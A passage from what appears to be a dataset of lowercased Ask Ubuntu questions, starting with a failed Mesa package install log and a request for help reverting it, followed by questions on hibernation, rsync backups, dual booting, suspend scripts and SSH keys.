libgl1-mesa-glx-dbg : amd64 ( from libgl1-mesa-glx-dbg_9.2.3~brppa-0ubuntu1_amd64.deb ) ... preparing to replace libglapi-mesa : amd64 9.2.1-1ubuntu3 ( using libglapi-mesa_9.2.3~brppa-0ubuntu1_amd64.deb ) ... de-configuring libglapi-mesa : i386 ... unpacking replacement libglapi-mesa : amd64 ... selecting previously unselected package libglapi-mesa-dbg : amd64 . unpacking libglapi-mesa-dbg : amd64 ( from libglapi-mesa-dbg_9.2.3~brppa-0ubuntu1_amd64.deb ) ... selecting previously unselected package libgles1-mesa : amd64 . unpacking libgles1-mesa : amd64 ( from libgles1-mesa_9.2.3~brppa-0ubuntu1_amd64.deb ) ... selecting previously unselected package libgles1-mesa-dbg : amd64 . unpacking libgles1-mesa-dbg : amd64 ( from libgles1-mesa-dbg_9.2.3~brppa-0ubuntu1_amd64.deb ) ... selecting previously unselected package libgles1-mesa-dev . unpacking libgles1-mesa-dev ( from libgles1-mesa-dev_9.2.3~brppa-0ubuntu1_amd64.deb ) ... preparing to replace libgles2-mesa : amd64 9.2.1-1ubuntu3 ( using libgles2-mesa_9.2.3~brppa-0ubuntu1_amd64.deb ) ... unpacking replacement libgles2-mesa : amd64 ... selecting previously unselected package libgles2-mesa-dbg : amd64 . unpacking libgles2-mesa-dbg : amd64 ( from libgles2-mesa-dbg_9.2.3~brppa-0ubuntu1_amd64.deb ) ... selecting previously unselected package libgles2-mesa-dev . unpacking libgles2-mesa-dev ( from libgles2-mesa-dev_9.2.3~brppa-0ubuntu1_amd64.deb ) ... preparing to replace libopenvg1-mesa : amd64 9.2.1-1ubuntu3 ( using libopenvg1-mesa_9.2.3~brppa-0ubuntu1_amd64.deb ) ... unpacking replacement libopenvg1-mesa : amd64 ... selecting previously unselected package libopenvg1-mesa-dbg : amd64 . unpacking libopenvg1-mesa-dbg : amd64 ( from libopenvg1-mesa-dbg_9.2.3~brppa-0ubuntu1_amd64.deb ) ... selecting previously unselected package libopenvg1-mesa-dev . unpacking libopenvg1-mesa-dev ( from libopenvg1-mesa-dev_9.2.3~brppa-0ubuntu1_amd64.deb ) ... preparing to replace libosmesa6 : amd64 9.2.1-1ubuntu3 ( using libosmesa6_9.2.3~brppa-0ubuntu1_amd64.deb ) ... de-configuring libosmesa6 : i386 ... unpacking replacement libosmesa6 : amd64 ... selecting previously unselected package libosmesa6-dev . unpacking libosmesa6-dev ( from libosmesa6-dev_9.2.3~brppa-0ubuntu1_amd64.deb ) ... preparing to replace libxatracker1 : amd64 9.2.1-1ubuntu3 ( using libxatracker1_9.2.3~brppa-0ubuntu1_amd64.deb ) ... unpacking replacement libxatracker1 : amd64 ... selecting previously unselected package libxatracker1-dbg : amd64 . unpacking libxatracker1-dbg : amd64 ( from libxatracker1-dbg_9.2.3~brppa-0ubuntu1_amd64.deb ) ... selecting previously unselected package libxatracker-dev . unpacking libxatracker-dev ( from libxatracker-dev_9.2.3~brppa-0ubuntu1_amd64.deb ) ... preparing to replace linux-headers-3.11.8-031108 3.11.8-031108.201311122252 ( using linux-headers-3.11.8-031108_3.11.8-031108.201311122252_all.deb ) ... unpacking replacement linux-headers-3.11.8-031108 ... preparing to replace linux-headers-3.11.8-031108-generic 3.11.8-031108.201311122252 ( using linux-headers-3.11.8-031108-generic_3.11.8-031108.201311122252_amd64.deb ) ... unpacking replacement linux-headers-3.11.8-031108-generic ... preparing to replace linux-image-3.11.8-031108-generic 3.11.8-031108.201311122252 ( using linux-image-3.11.8-031108-generic_3.11.8-031108.201311122252_amd64.deb ) ... done . unpacking replacement linux-image-3.11.8-031108-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.8-031108-generic /boot/vmlinuz-3.11.8-031108-generic run-parts : executing /etc/kernel/postrm.d/zz-extlinux 3.11.8-031108-generic /boot/vmlinuz-3.11.8-031108-generic p : checking for extlinux directory ... found . p : writing config for /boot/vmlinuz-3.9.4-030904-generic ... p : writing config for /boot/vmlinuz-3.5.0-27-generic ... p : writing config for /boot/vmlinuz-3.11.8-031108-generic ... p : writing config for /boot/vmlinuz-3.11.0-12-generic ... p : writing config for windows 7 ( loader ) on /dev/sdb2 ... p : installing debian theme ... done . run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.11.8-031108-generic /boot/vmlinuz-3.11.8-031108-generic preparing to replace mesa-common-dev 9.2.1-1ubuntu3 ( using mesa-common-dev_9.2.3~brppa-0ubuntu1_amd64.deb ) ... unpacking replacement mesa-common-dev ... dpkg : dependency problems prevent configuration of libegl1-mesa : amd64 : libegl1-mesa : amd64 depends on libwayland0 ( > = 1.0.2 ) ; however : package libwayland0 : amd64 is not installed . dpkg : error processing libegl1-mesa : amd64 ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libegl1-mesa-dbg : amd64 : libegl1-mesa-dbg : amd64 depends on libegl1-mesa ( = 9.2.3~brppa-0ubuntu1 ) ; however : package libegl1-mesa : amd64 is not configured yet . dpkg : error processing libegl1-mesa-dbg : amd64 ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libegl1-mesa-dev : libegl1-mesa-dev depends on libegl1-mesa ( = 9.2.3~brppa-0ubuntu1 ) ; however : package libegl1-mesa : amd64 is not configured yet . dpkg : error processing libegl1-mesa-dev ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libegl1-mesa-drivers : amd64 : libegl1-mesa-drivers : amd64 depends on libegl1-mesa ( = 9.2.3~brppa-0ubuntu1 ) ; however : package libegl1-mesa : amd64 is not configured yet . libegl1-mesa-drivers : amd64 depends on libwayland0 ( > = 1.0.2 ) ; however : package libwayland0 : amd64 is not installed . dpkg : error processing libegl1-mesa-drivers : amd64 ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libegl1-mesa-drivers-dbg : amd64 : libegl1-mesa-drivers-dbg : amd64 depends on libegl1-mesa-drivers ( = 9.2.3~brppa-0ubuntu1 ) ; however : package libegl1-mesa-drivers : amd64 is not configured yet . dpkg : error processing libegl1-mesa-drivers-dbg : amd64 ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgbm1 : amd64 : libgbm1 : amd64 depends on libwayland0 ( > = 1.0.2 ) ; however : package libwayland0 : amd64 is not installed . dpkg : error processing libgbm1 : amd64 ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgbm1-dbg : amd64 : libgbm1-dbg : amd64 depends on libgbm1 ( = 9.2.3~brppa-0ubuntu1 ) ; however : package libgbm1 : amd64 is not configured yet . dpkg : error processing libgbm1-dbg : amd64 ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgbm-dev : libgbm-dev depends on libgbm1 ( = 9.2.3~brppa-0ubuntu1 ) ; however : package libgbm1 : amd64 is not configured yet . libgbm-dev depends on libudev-dev ; however : package libudev-dev is not installed . dpkg : error processing libgbm-dev ( -- install ) : dependency problems - leaving unconfigured dpkg : error processing libgl1-mesa-dri : amd64 ( -- install ) : package libgl1-mesa-dri : amd64 9.2.3~brppa-0ubuntu1 can not be configured because libgl1-mesa-dri : i386 is at a different version ( 9.2.1-1ubuntu3 ) dpkg : error processing libgl1-mesa-dri : i386 ( -- install ) : package libgl1-mesa-dri : i386 9.2.1-1ubuntu3 can not be configured because libgl1-mesa-dri : amd64 is at a different version ( 9.2.3~brppa-0ubuntu1 ) dpkg : dependency problems prevent configuration of libgl1-mesa-dri-dbg : amd64 : libgl1-mesa-dri-dbg : amd64 depends on libgl1-mesa-dri ( = 9.2.3~brppa-0ubuntu1 ) ; however : package libgl1-mesa-dri : amd64 is not configured yet . dpkg : error processing libgl1-mesa-dri-dbg : amd64 ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgl1-mesa-dri-experimental : amd64 : libgl1-mesa-dri-experimental : amd64 depends on libgl1-mesa-dri ( > = 7.11.1 ) ; however : package libgl1-mesa-dri : amd64 is not configured yet . dpkg : error processing libgl1-mesa-dri-experimental : amd64 ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgl1-mesa-dri-experimental-dbg : amd64 : libgl1-mesa-dri-experimental-dbg : amd64 depends on libgl1-mesa-dri-experimental ( = 9.2.3~brppa-0ubuntu1 ) ; however : package libgl1-mesa-dri-experimental : amd64 is not configured yet . dpkg : error processing libgl1-mesa-dri-experimental-dbg : amd64 ( -- install ) : dependency problems - leaving unconfigured dpkg : error processing libgl1-mesa-glx : amd64 ( -- install ) : package libgl1-mesa-glx : amd64 9.2.3~brppa-0ubuntu1 can not be configured because libgl1-mesa-glx : i386 is at a different version ( 9.2.1-1ubuntu3 ) dpkg : error processing libgl1-mesa-glx : i386 ( -- install ) : package libgl1-mesa-glx : i386 9.2.1-1ubuntu3 can not be configured because libgl1-mesa-glx : amd64 is at a different version ( 9.2.3~brppa-0ubuntu1 ) dpkg : dependency problems prevent configuration of libgl1-mesa-glx-dbg : amd64 : libgl1-mesa-glx-dbg : amd64 depends on libgl1-mesa-glx ( = 9.2.3~brppa-0ubuntu1 ) ; however : package libgl1-mesa-glx : amd64 is not configured yet . dpkg : error processing libgl1-mesa-glx-dbg : amd64 ( -- install ) : dependency problems - leaving unconfigured dpkg : error processing libglapi-mesa : amd64 ( -- install ) : package libglapi-mesa : amd64 9.2.3~brppa-0ubuntu1 can not be configured because libglapi-mesa : i386 is at a different version ( 9.2.1-1ubuntu3 ) dpkg : error processing libglapi-mesa : i386 ( -- install ) : package libglapi-mesa : i386 9.2.1-1ubuntu3 can not be configured because libglapi-mesa : amd64 is at a different version ( 9.2.3~brppa-0ubuntu1 ) dpkg : dependency problems prevent configuration of libglapi-mesa-dbg : amd64 : libglapi-mesa-dbg : amd64 depends on libglapi-mesa ( = 9.2.3~brppa-0ubuntu1 ) ; however : package libglapi-mesa : amd64 is not configured yet . dpkg : error processing libglapi-mesa-dbg : amd64 ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgles1-mesa : amd64 : libgles1-mesa : amd64 depends on libglapi-mesa ( = 9.2.3~brppa-0ubuntu1 ) ; however : package libglapi-mesa : amd64 is not configured yet . dpkg : error processing libgles1-mesa : amd64 ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgles1-mesa-dbg : amd64 : libgles1-mesa-dbg : amd64 depends on libgles1-mesa ( = 9.2.3~brppa-0ubuntu1 ) ; however : package libgles1-mesa : amd64 is not configured yet . dpkg : error processing libgles1-mesa-dbg : amd64 ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgles1-mesa-dev : libgles1-mesa-dev depends on libgles1-mesa ( = 9.2.3~brppa-0ubuntu1 ) ; however : package libgles1-mesa : amd64 is not configured yet . libgles1-mesa-dev depends on libegl1-mesa-dev ; however : package libegl1-mesa-dev is not configured yet . dpkg : error processing libgles1-mesa-dev ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgles2-mesa : amd64 : libgles2-mesa : amd64 depends on libglapi-mesa ( = 9.2.3~brppa-0ubuntu1 ) ; however : package libglapi-mesa : amd64 is not configured yet . dpkg : error processing libgles2-mesa : amd64 ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgles2-mesa-dbg : amd64 : libgles2-mesa-dbg : amd64 depends on libgles2-mesa ( = 9.2.3~brppa-0ubuntu1 ) ; however : package libgles2-mesa : amd64 is not configured yet . dpkg : error processing libgles2-mesa-dbg : amd64 ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgles2-mesa-dev : libgles2-mesa-dev depends on libgles2-mesa ( = 9.2.3~brppa-0ubuntu1 ) ; however : package libgles2-mesa : amd64 is not configured yet . libgles2-mesa-dev depends on libegl1-mesa-dev ; however : package libegl1-mesa-dev is not configured yet . dpkg : error processing libgles2-mesa-dev ( -- install ) : dependency problems - leaving unconfigured setting up libopenvg1-mesa : amd64 ( 9.2.3~brppa-0ubuntu1 ) ... setting up libopenvg1-mesa-dbg : amd64 ( 9.2.3~brppa-0ubuntu1 ) ... dpkg : dependency problems prevent configuration of libopenvg1-mesa-dev : libopenvg1-mesa-dev depends on libegl1-mesa-dev ; however : package libegl1-mesa-dev is not configured yet . dpkg : error processing libopenvg1-mesa-dev ( -- install ) : dependency problems - leaving unconfigured dpkg : error processing libosmesa6 : amd64 ( -- install ) : package libosmesa6 : amd64 9.2.3~brppa-0ubuntu1 can not be configured because libosmesa6 : i386 is at a different version ( 9.2.1-1ubuntu3 ) dpkg : error processing libosmesa6 : i386 ( -- install ) : package libosmesa6 : i386 9.2.1-1ubuntu3 can not be configured because libosmesa6 : amd64 is at a different version ( 9.2.3~brppa-0ubuntu1 ) dpkg : dependency problems prevent configuration of libosmesa6-dev : libosmesa6-dev depends on libosmesa6 ( = 9.2.3~brppa-0ubuntu1 ) ; however : package libosmesa6 : amd64 is not configured yet . dpkg : error processing libosmesa6-dev ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libxatracker1 : amd64 : libxatracker1 : amd64 depends on libgl1-mesa-dri ; however : package libgl1-mesa-dri : amd64 is not configured yet . dpkg : error processing libxatracker1 : amd64 ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libxatracker1-dbg : amd64 : libxatracker1-dbg : amd64 depends on libxatracker1 ( = 9.2.3~brppa-0ubuntu1 ) ; however : package libxatracker1 : amd64 is not configured yet . dpkg : error processing libxatracker1-dbg : amd64 ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libxatracker-dev : libxatracker-dev depends on libxatracker1 ( = 9.2.3~brppa-0ubuntu1 ) ; however : package libxatracker1 : amd64 is not configured yet . dpkg : error processing libxatracker-dev ( -- install ) : dependency problems - leaving unconfigured setting up linux-headers-3.11.8-031108 ( 3.11.8-031108.201311122252 ) ... setting up linux-headers-3.11.8-031108-generic ( 3.11.8-031108.201311122252 ) ... examining /etc/kernel/header_postinst.d . run-parts : executing /etc/kernel/header_postinst.d/dkms 3.11.8-031108-generic /boot/vmlinuz-3.11.8-031108-generic setting up linux-image-3.11.8-031108-generic ( 3.11.8-031108.201311122252 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) not updating initrd symbolic links since we are being updated/reinstalled ( 3.11.8-031108.201311122252 was configured last , according to dpkg ) not updating image symbolic links since we are being updated/reinstalled ( 3.11.8-031108.201311122252 was configured last , according to dpkg ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.11.8-031108-generic /boot/vmlinuz-3.11.8-031108-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.11.8-031108-generic /boot/vmlinuz-3.11.8-031108-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.11.8-031108-generic /boot/vmlinuz-3.11.8-031108-generic update-initramfs : generating /boot/initrd.img-3.11.8-031108-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.11.8-031108-generic /boot/vmlinuz-3.11.8-031108-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.11.8-031108-generic /boot/vmlinuz-3.11.8-031108-generic run-parts : executing /etc/kernel/postinst.d/zz-extlinux 3.11.8-031108-generic /boot/vmlinuz-3.11.8-031108-generic p : checking for extlinux directory ... found . p : writing config for /boot/vmlinuz-3.9.4-030904-generic ... p : writing config for /boot/vmlinuz-3.5.0-27-generic ... p : writing config for /boot/vmlinuz-3.11.8-031108-generic ... p : writing config for /boot/vmlinuz-3.11.0-12-generic ... p : writing config for windows 7 ( loader ) on /dev/sdb2 ... p : installing debian theme ... done . run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.11.8-031108-generic /boot/vmlinuz-3.11.8-031108-generic generating grub.cfg ... found linux image : /boot/vmlinuz-3.11.8-031108-generic found initrd image : /boot/initrd.img-3.11.8-031108-generic found linux image : /boot/vmlinuz-3.11.0-12-generic found initrd image : /boot/initrd.img-3.11.0-12-generic found linux image : /boot/vmlinuz-3.9.4-030904-generic found initrd image : /boot/initrd.img-3.9.4-030904-generic found linux image : /boot/vmlinuz-3.5.0-27-generic found initrd image : /boot/initrd.img-3.5.0-27-generic found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sdb2 done setting up mesa-common-dev ( 9.2.3~brppa-0ubuntu1 ) ... dpkg : dependency problems prevent configuration of libgl1-mesa-dev : libgl1-mesa-dev depends on libgl1-mesa-glx ( = 9.2.3~brppa-0ubuntu1 ) ; however : package libgl1-mesa-glx : amd64 is not configured yet . dpkg : error processing libgl1-mesa-dev ( -- install ) : dependency problems - leaving unconfigured processing triggers for libc-bin ... errors were encountered while processing : libegl1-mesa : amd64 libegl1-mesa-dbg : amd64 libegl1-mesa-dev libegl1-mesa-drivers : amd64 libegl1-mesa-drivers-dbg : amd64 libgbm1 : amd64 libgbm1-dbg : amd64 libgbm-dev libgl1-mesa-dri : amd64 libgl1-mesa-dri : i386 libgl1-mesa-dri-dbg : amd64 libgl1-mesa-dri-experimental : amd64 libgl1-mesa-dri-experimental-dbg : amd64 libgl1-mesa-glx : amd64 libgl1-mesa-glx : i386 libgl1-mesa-glx-dbg : amd64 libglapi-mesa : amd64 libglapi-mesa : i386 libglapi-mesa-dbg : amd64 libgles1-mesa : amd64 libgles1-mesa-dbg : amd64 libgles1-mesa-dev libgles2-mesa : amd64 libgles2-mesa-dbg : amd64 libgles2-mesa-dev libopenvg1-mesa-dev libosmesa6 : amd64 libosmesa6 : i386 libosmesa6-dev libxatracker1 : amd64 libxatracker1-dbg : amd64 libxatracker-dev libgl1-mesa-dev i got scared that it was going to bork my system , so i tried to uninstall some with the following two commands ( which did n't seem to do anything ) . $ sudo apt-get purge libxatracker-dev libxatracker1-dbg : amd64 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies . libegl1-mesa : depends : libwayland0 ( > = 1.0.2 ) but it is not installable libegl1-mesa-drivers : depends : libwayland0 ( > = 1.0.2 ) but it is not installable libgbm-dev : depends : libudev-dev but it is not going to be installed libgbm1 : depends : libwayland0 ( > = 1.0.2 ) but it is not installable libgl1-mesa-dri : breaks : libgl1-mesa-dri : i386 ( ! = 9.2.3~brppa-0ubuntu1 ) but 9.2.1-1ubuntu3 is to be installed libgl1-mesa-dri : i386 : breaks : libgl1-mesa-dri ( ! = 9.2.1-1ubuntu3 ) but 9.2.3~brppa-0ubuntu1 is to be installed libgl1-mesa-glx : breaks : libgl1-mesa-glx : i386 ( ! = 9.2.3~brppa-0ubuntu1 ) but 9.2.1-1ubuntu3 is to be installed libgl1-mesa-glx : i386 : breaks : libgl1-mesa-glx ( ! = 9.2.1-1ubuntu3 ) but 9.2.3~brppa-0ubuntu1 is to be installed libglapi-mesa : breaks : libglapi-mesa : i386 ( ! = 9.2.3~brppa-0ubuntu1 ) but 9.2.1-1ubuntu3 is to be installed libglapi-mesa : i386 : breaks : libglapi-mesa ( ! = 9.2.1-1ubuntu3 ) but 9.2.3~brppa-0ubuntu1 is to be installed libosmesa6 : breaks : libosmesa6 : i386 ( ! = 9.2.3~brppa-0ubuntu1 ) but 9.2.1-1ubuntu3 is to be installed libosmesa6 : i386 : breaks : libosmesa6 ( ! = 9.2.1-1ubuntu3 ) but 9.2.3~brppa-0ubuntu1 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . $ sudo apt-get -f purge libxatracker-dev libxatracker1-dbg : amd64 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies . libegl1-mesa : depends : libwayland0 ( > = 1.0.2 ) but it is not installable libegl1-mesa-drivers : depends : libwayland0 ( > = 1.0.2 ) but it is not installable libgbm-dev : depends : libudev-dev but it is not going to be installed libgbm1 : depends : libwayland0 ( > = 1.0.2 ) but it is not installable libgl1-mesa-dri : breaks : libgl1-mesa-dri : i386 ( ! = 9.2.3~brppa-0ubuntu1 ) but 9.2.1-1ubuntu3 is to be installed libgl1-mesa-dri : i386 : breaks : libgl1-mesa-dri ( ! = 9.2.1-1ubuntu3 ) but 9.2.3~brppa-0ubuntu1 is to be installed libgl1-mesa-glx : breaks : libgl1-mesa-glx : i386 ( ! = 9.2.3~brppa-0ubuntu1 ) but 9.2.1-1ubuntu3 is to be installed libgl1-mesa-glx : i386 : breaks : libgl1-mesa-glx ( ! = 9.2.1-1ubuntu3 ) but 9.2.3~brppa-0ubuntu1 is to be installed libglapi-mesa : breaks : libglapi-mesa : i386 ( ! = 9.2.3~brppa-0ubuntu1 ) but 9.2.1-1ubuntu3 is to be installed libglapi-mesa : i386 : breaks : libglapi-mesa ( ! = 9.2.1-1ubuntu3 ) but 9.2.3~brppa-0ubuntu1 is to be installed libosmesa6 : breaks : libosmesa6 : i386 ( ! = 9.2.3~brppa-0ubuntu1 ) but 9.2.1-1ubuntu3 is to be installed libosmesa6 : i386 : breaks : libosmesa6 ( ! = 9.2.1-1ubuntu3 ) but 9.2.3~brppa-0ubuntu1 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i then changed my mind again , and tried to install dependencies with $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : abiword-common evolution-data-server-common kate libaudio2 : i386 libcamel-1.2-43 libclutter-1.0-common libcogl-common libdbusmenu-qt2 : i386 libebook-contacts-1.2-0 libedataserver-1.2-17 libgdome2-cpp-smart0c2a libgtkmathview0c2a libicu48 : i386 libkwinactiveeffects1abi4 liblcms1 : i386 liblink-grammar4 libmng1 : i386 libmysqlclient18 : i386 libots0 libqt4-dbus : i386 libqt4-declarative : i386 libqt4-network : i386 libqt4-script : i386 libqt4-sql : i386 libqt4-sql-mysql : i386 libqt4-xml : i386 libqt4-xmlpatterns : i386 libqtcore4 : i386 libqtgui4 : i386 libsdl-net1.2 libudev-dev libwayland-server0 libwv-1.2-4 libxss1 : i386 link-grammar-dictionaries-en sni-qt : i386 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libudev-dev the following packages will be removed abiword abiword-plugin-grammar abiword-plugin-mathview gstreamer1.0-plugins-bad handbrake-gtk kde-window-manager kde-workspace kubuntu-desktop kubuntu-full libabiword-3.0 libchamplain-0.12-0 libchamplain-gtk-0.12-0 libclutter-1.0-0 libclutter-gtk-1.0-0 libcogl-pango12 libcogl12 libegl1-mesa libegl1-mesa-dbg libegl1-mesa-dev libegl1-mesa-drivers libegl1-mesa-drivers-dbg libgbm-dev libgbm1 libgbm1-dbg libgl1-mesa-dri : i386 libgl1-mesa-glx : i386 libglapi-mesa : i386 libgles1-mesa-dev libgles2-mesa-dev libglu1-mesa : i386 libgstreamer-plugins-bad1.0-0 libkwinglesutils1 libkwinglutils1abi3 libopenvg1-mesa-dev libosmesa6 : i386 libqt4-opengl : i386 libqtwebkit4 : i386 libvisual-0.4-plugins : i386 skype skype-bin : i386 virtualgl-libs : i386 virtualgl-libs-ia32 : i386 wine wine1.5 wine1.5-amd64 wine1.5-i386 : i386 wine1.6 wine1.6-amd64 wine1.6-i386 : i386 xserver-xorg-glamoregl xserver-xorg-video-all xserver-xorg-video-ati the following new packages will be installed libudev-dev 0 upgraded , 1 newly installed , 52 to remove and 83 not upgraded . 33 not fully installed or removed . need to get 27.0 kb of archives . after this operation , 417 mb disk space will be freed . do you want to continue [ y/n ] ? n abort . however , for some reason , things like abiword were marked for uninstall . so : why is abiwork , etc . marked for uninstall ? how would i revert this horrible half-installation ? is it possible to make this installation work ( in an easily revertable fashion ) , or should i install mesa from source ( and is that revertable ) ?
378312	`` resuming from /dev/disk/by-uuid/ ... '' message on normal boot	i installed tuxonice in ubuntu 13.10 and everything works as intended ( resuming , hibernation ) . the only strange thing that happens is that it get a `` resuming from /dev/disk/by-uuid/ ... '' message when i just boot up my computer that i usually only get when my computer really resumes from hibernation . the only diffrence between the two situations is that on a normal boot the dots on the splash animation change and on resuming are just static white . how can i remove the unneeded `` resuming ... '' message on a normal boot ?
378316	archiving with rsync	i want to back up my data to an external hard drive . so far , i used to directly copy and paste each version of my home directory . this creates many versions of home directory . many files are common between these home2010 , home2011 etc . i want a code/software that checks a hard drive ( all directories ) and if a file exists already with that name , it does n't copy that file . also if possible , i want it to just work on one directory and just adds new files ( merge ) . backup software does n't seem to do what i want . it 's a kind of a realtime backup that deletes file too . it 's also not in native format . some other way of using rsync is probably needed . sorry if i 'm a newbie in backup/archiving .
378318	auto upload mp4 files from phone to ububtu one	is it possible for mp4 files to auto upload from my phone ( nexus 5 , kitkat ) into my ubuntu one account ? jpg files upload fine but mp4 just will not add to my ubuntu one 'nexus 5 ' folder . this functionality exists , and works , on dropbox and google+ so i do have a copy of the videos . it 's a bit odd if this functionality did n't exisit on ubuntu one so i assume i 'm missing something .
378320	dual boot ubuntu 13.10 and windows 7	i want to install ubuntu 13.10 on my pre-installed windows 7 pc and i want a dual boot . i have no empty partition on my hard disk drive . i do n't want to re-install windows 7 and do n't want to install ubuntu on c drive . i want to install on a different partition but i want to resize it . how should i do it ? please answer in steps . also suggest the amount of space i should allocte to ubuntu 13.10 .
378321	brightness settings can not hold on reboot	i am using ubuntu 13.10 , on a asus n55s notebook . i adjust the screen 's brightness to the right level , but every time i reboot ubuntu , the brightness go back to maxmium . how can i lock the brightness ?
378322	how to make resume script wait for ivtv initialization	i have a tv tuner card with an infrared sensor . i have made a script to remove/start ivtv kernel module and shutdown/restart lirc service on suspend/resume . the problem is that the lirc service start command runs before ivtv has found and initialized the hardware , so it fails . is there a way to defer the lirc service start until after the hardware has been initialized ? the script file is : /etc/pm/sleep.d/30_ivtv and its contents : # ! /bin/sh # # hauppauge pvr250 tv-card and tbs6680 dvb-card are dead after resume , fix it . /usr/lib/pm-utils/functions case `` $ 1 '' in hibernate|suspend ) # vlc prevents sleep killall vlc # lirc ... service lirc stop # disable ivtv to prevent hauppauge from being dead on resume rmmod ivtv # disable tbs6680 dvb card to prevent it from being dead on resume rmmod saa716x_tbs_dvb ; ; thaw|resume ) modprobe saa716x_tbs_dvb modprobe ivtv # here we need to wait until ir sensor device initialization is done ! service lirc start ; ; * ) ; ; esac exit snippet from syslog after resume : lircd-0.9.0 [ 13717 ] : lircd ( devinput ) ready , using /var/run/lirc/lircd lircd-0.9.0 [ 13717 ] : accepted new client on /var/run/lirc/lircd lircd-0.9.0 [ 13717 ] : initializing '/dev/input/event' lircd-0.9.0 [ 13717 ] : unable to open '/dev/input/event' lircd-0.9.0 [ 13717 ] : failed to initialize hardware kernel : [ 34425.580877 ] init : handling lirc-device-added event ... kernel : [ 34426.032906 ] ivtv : start initialization , version 1.4.3 ... kernel : [ 34426.093966 ] ivtv0 : autodetected hauppauge wintv pvr-250 ... kernel : [ 34426.273807 ] init : handling i2c-device-added event kernel : [ 34426.274758 ] registered ir keymap rc-hauppauge kernel : [ 34426.274801 ] input : i2c ir ( hauppauge ) as /devices/virtual/rc/rc13/input71 kernel : [ 34426.274854 ] rc13 : i2c ir ( hauppauge ) as /devices/virtual/rc/rc13 kernel : [ 34426.274856 ] ir-kbd-i2c : i2c ir ( hauppauge ) detected at i2c-2/2-0018/ir0 [ ivtv i2c driver # 0 ] kernel : [ 34426.275080 ] init : handling i2c-device-added event kernel : [ 34426.275135 ] init : handling rc-device-added event ...
378327	can not install ubuntu 12.04 lts on acer aspire 4736g through cd/dvd	nowadays i try install ubuntu on my laptop through cd , there is a error message i can not resolved , i try many ways , search the internet , and find some solutions , but it can not help me , who can tell me the answer , thank you the error message is : this particular error is often due to a faulty cd/dvd disk or drive , or a faulty hard disk . it may help to clean the cd/dvd , to burn the cd/dvd at a lower speed , to clean the cd/dvd drive lens ( cleaning kits are often available from electronics suppliers ) , to check whether the hard disk is old and in need of replacement , or to move the system to a cooler environment .
378330	how to boot without using bootable usb ?	i installed ubuntu 12.04.1 with a bootable usb replacing the prior operating system . it worked , i can use the computer , but only if i boot up with the usb . otherwise , the screen turns into black and i have to reboot it with the usb . how can i fix this ?
378335	deluge error after restart ubuntu ( i need to delete 2 files )	i added deluge in startup applications and sometimes after restart or shutdown , deluge wo n't start . if i try to run it in terminal then i get the next error : vas @ lenovoz580 : ~ $ deluge [ error ] 11:18:36 ipcinterface:156 deluge restart failed : could n't listen on any : /home/vas/.config/deluge/ipc/deluge-gtk : can not acquire lock . if i delete /home/vas/.config/deluge/ipc/deluge-gtk and /home/vas/.config/deluge/ipc/deluge-gtk.lockthen deluge starts normally . how can i set that when i restart or shutdown the laptop , these 2 files to be deleted if they exist ?
378339	sudo mysqldump : permission denied	i am trying to run sudo mysqldump with user account but i get : permission denied message if i switch to sudo su then it works . the question is why sudo gives permission denied ? should i give some other privileges on my user account ?
378342	passwordless ssh can not accept the key	i 'd like to connect 4 hosts with paswordless ssh . i generate public rsa key with ssh-keygen command , then copy this keyfile to the other machines with ssh-copy-id -i ~/.ssh/id_rsa.pub @ command . when i try ssh to first two hosts , it 's working , not ask password for login , but the third one still need key . when i try to login to the two working hosts with ssh -v command , the host accept the key , debug1 : offering public key : /home//.ssh/id_rsa debug1 : server accepts key : pkalg ssh-rsa * * but the other offer the key , skip accept , and try to ask .ssh/identity and .ssh/id_rsa keys . debug1 : offering public key : /home/hadoop/.ssh/id_rsa debug1 : authentications that can continue : publickey , gssapi-keyex , gssapi-with-mic , password how should i do this ?
